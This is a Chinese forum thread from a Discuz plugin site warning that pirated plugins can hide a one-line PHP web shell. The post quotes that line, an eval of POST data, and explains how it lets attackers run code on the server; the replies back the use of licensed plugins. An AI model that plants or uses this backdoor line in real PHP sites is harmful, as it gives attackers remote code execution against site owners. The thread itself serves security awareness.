·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
返回列表 发布新帖

某盗版插件中惊现一句话木马,小到让你根本无法发现

421 5

马上注册,免费下载更多dz插件网资源。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
传送门:安全小知识:为什么使用盗版插件容易被挂马!
  1. @eval($_POST['a']);
复制代码
如上面所示,就这么短短的几个字符,隐藏在盗版插件正常代码之中,如果不细心的话,根本无法发现。
不懂php的人,可能会怀疑,这么短的一个代码,就是木马?
eval就是把普通的字符串当做php代码来执行,像上面这个代码就是执行接收到的POST数据,利用这段代码,黑客就可以向你的服务器执行代码了。
抓紧时间卸载盗版插件吧,盗版插件的安全问题已经不能忽视了!


传送门:安全小知识:为什么使用盗版插件容易被挂马!
我要说一句 收起回复
创宇盾启航版免费网站防御网站加速服务

评论5

婷姐Lv.8 发表于 2023-3-29 15:44:31 | 查看全部
前排支持,拒绝盗版
如果你只要用了一次盗版插件,一句后门代码,就可以让整个网站作废

有些攻击者不是只劫持首页到非法网站上那么简单,有的时候还会用“间谍式”写入更多潜在后门入口文件,而且命名法会伪装成正常文件名称,代码可能还是加密,以免被检测,这样就可以留着以后再进行攻击,即使你这时候把盗版插件删除,也是无济于事,还是一样会被攻击,除非你把所有新植入的后门文件也都删除了,否则针对一般站长而言,想要安全,就不得不重装网站了

如果等发生以上情况再付费找人清理后门文件和维护,不但服务费成本高,也可能没法根除到底,对于如果用心经营网站的站长,千万不要选择盗版插件,也不要随意授权网站关键信息资源给第三方,如服务器,FTP等,做好及时性备份,拒绝使用盗版插件或模版
我要说一句 收起回复
婷姐Lv.8 发表于 2023-3-29 15:45:30 | 查看全部
不能用 盗版  

万一有个木马  全站就废了

还是正版用着放心既可以  以后更新  还有售后服务!
我要说一句 收起回复
浅生Lv.8 发表于 2023-3-29 15:46:16 | 查看全部
坚决不用盗版
我要说一句 收起回复
浅生Lv.8 发表于 2023-3-29 15:46:42 | 查看全部
说的对,支持 正版
我要说一句 收起回复
婷姐Lv.8 发表于 2023-3-29 15:46:48 | 查看全部
哦哦明白了
我要说一句 收起回复

回复

 懒得打字嘛,点击右侧快捷回复【查看最新发布】   【应用商城享更多资源】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:3.149.238.67,GMT+8, 2024-12-22 23:26 , Processed in 0.220880 second(s), 103 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯 在本版发帖
扫一扫添加微信客服
QQ客服返回顶部
快速回复 返回顶部 返回列表